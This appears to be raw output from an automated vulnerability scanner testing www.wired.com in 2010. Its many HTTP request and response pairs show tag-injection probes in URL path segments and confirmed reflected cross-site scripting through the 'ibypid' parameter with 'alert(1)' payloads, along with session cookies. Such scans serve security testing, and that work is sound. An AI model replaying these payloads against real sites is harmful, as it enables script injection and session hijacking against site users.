GET /gadgets/wirelessbd750"><a>8d8676eb6a9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29352 Vary: Accept-Encoding Cache-Control: max-age=597 Expires: Sun, 21 Nov 2010 23:18:52 GMT Date: Sun, 21 Nov 2010 23:08:55 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gadgets ss_wirelessbd750"><a>8d8676eb6a9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4899"><a>1ca469d09ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaminga4899"><a>1ca469d09ed HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29382 Vary: Accept-Encoding Cache-Control: max-age=222 Expires: Mon, 22 Nov 2010 01:15:04 GMT Date: Mon, 22 Nov 2010 01:11:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaminga4899"><a>1ca469d09ed"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b691"><a>f527151e420 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming3b691"><a>f527151e420/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29383 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 20:18:56 GMT Date: Sun, 21 Nov 2010 20:14:56 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming3b691"><a>f527151e420"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e36d"><a>49ae0050530 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming5e36d"><a>49ae0050530/gamingreviews HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=232 Expires: Sun, 21 Nov 2010 23:12:30 GMT Date: Sun, 21 Nov 2010 23:08:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming5e36d"><a>49ae0050530 ss_gamingreviews"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1de64"><a>eaff00508ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/gamingreviews1de64"><a>eaff00508ec HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:07 GMT Date: Sun, 21 Nov 2010 23:09:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_gamingreviews1de64"><a>eaff00508ec"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5e9a"><a>5d92c74d73d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gamingc5e9a"><a>5d92c74d73d/hardware HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29403 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:12:26 GMT Date: Sun, 21 Nov 2010 23:08:26 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gamingc5e9a"><a>5d92c74d73d ss_hardware"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 511f3"><a>a929ebce08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/hardware511f3"><a>a929ebce08d HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29403 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:19:03 GMT Date: Sun, 21 Nov 2010 23:09:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_hardware511f3"><a>a929ebce08d"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdcfc"><a>0a261e4d294 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gamingbdcfc"><a>0a261e4d294/virtualworlds HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=226 Expires: Sun, 21 Nov 2010 23:12:23 GMT Date: Sun, 21 Nov 2010 23:08:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gamingbdcfc"><a>0a261e4d294 ss_virtualworlds"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97bbd"><a>49da4046a0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /gaming/virtualworlds97bbd"><a>49da4046a0e HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29413 Vary: Accept-Encoding Cache-Control: max-age=575 Expires: Sun, 21 Nov 2010 23:18:45 GMT Date: Sun, 21 Nov 2010 23:09:10 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_gaming ss_virtualworlds97bbd"><a>49da4046a0e"> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 96627%3balert(1)//343adadbdb2 was submitted in the ibypid parameter. This input was echoed as 96627;alert(1)//343adadbdb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/electric-car-grid/?ibypid=596627%3balert(1)//343adadbdb2 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:33 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=445
Expires: Sun, 21 Nov 2010 23:21:58 GMT
Date: Sun, 21 Nov 2010 23:14:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101588
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 596627;alert(1)//343adadbdb2;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 31876%3balert(1)//b8b3883cd7f was submitted in the ibypid parameter. This input was echoed as 31876;alert(1)//b8b3883cd7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/events-calendar?ibypid=231876%3balert(1)//b8b3883cd7f HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:13 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:13 GMT
Date: Sun, 21 Nov 2010 23:14:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 101948
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 231876;alert(1)//b8b3883cd7f;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 53f8c%3balert(1)//63f97596e7a was submitted in the ibypid parameter. This input was echoed as 53f8c;alert(1)//63f97596e7a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/must-sees/?ibypid=453f8c%3balert(1)//63f97596e7a HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:18 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:18 GMT
Date: Sun, 21 Nov 2010 23:14:18 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 103981
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 453f8c;alert(1)//63f97596e7a;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 985e3%3balert(1)//29173f1a6e4 was submitted in the ibypid parameter. This input was echoed as 985e3;alert(1)//29173f1a6e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/the-list?ibypid=3985e3%3balert(1)//29173f1a6e4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:17 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:17 GMT
Date: Sun, 21 Nov 2010 23:14:17 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 104027
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 3985e3;alert(1)//29173f1a6e4;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9281f%3balert(1)//1442148a2f4 was submitted in the ibypid parameter. This input was echoed as 9281f;alert(1)//1442148a2f4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/07/tweetcarts?ibypid=19281f%3balert(1)//1442148a2f4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:09 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=447
Expires: Sun, 21 Nov 2010 23:21:37 GMT
Date: Sun, 21 Nov 2010 23:14:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 102331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 19281f;alert(1)//1442148a2f4;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a7a08%3balert(1)//72fe6adb542 was submitted in the ibypid parameter. This input was echoed as a7a08;alert(1)//72fe6adb542 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/08/english-japanese-emoticon-translator/?ibypid=6a7a08%3balert(1)//72fe6adb542 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:28 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=446
Expires: Sun, 21 Nov 2010 23:21:55 GMT
Date: Sun, 21 Nov 2010 23:14:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 109190
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 6a7a08;alert(1)//72fe6adb542;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 67c96%3balert(1)//9c87be7eadf was submitted in the ibypid parameter. This input was echoed as 67c96;alert(1)//9c87be7eadf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/08/top-ten-most-popular-celebrities/?ibypid=767c96%3balert(1)//9c87be7eadf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:24 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:24 GMT
Date: Sun, 21 Nov 2010 23:14:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 107186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head p ...[SNIP]... <script>var currentNavFrame = 767c96;alert(1)//9c87be7eadf;</script> ...[SNIP]...
The value of the ibypid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f56c8%3balert(1)//bb7f19b9979 was submitted in the ibypid parameter. This input was echoed as f56c8;alert(1)//bb7f19b9979 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /inspiredbyyou/2010/09/ascent-of-robot/?ibypid=9f56c8%3balert(1)//bb7f19b9979 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/inspiredbyyou/xmlrpc.php
Last-Modified: Sun, 21 Nov 2010 23:14:39 GMT
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Sun, 21 Nov 2010 23:22:39 GMT
Date: Sun, 21 Nov 2010 23:14:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 105063
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
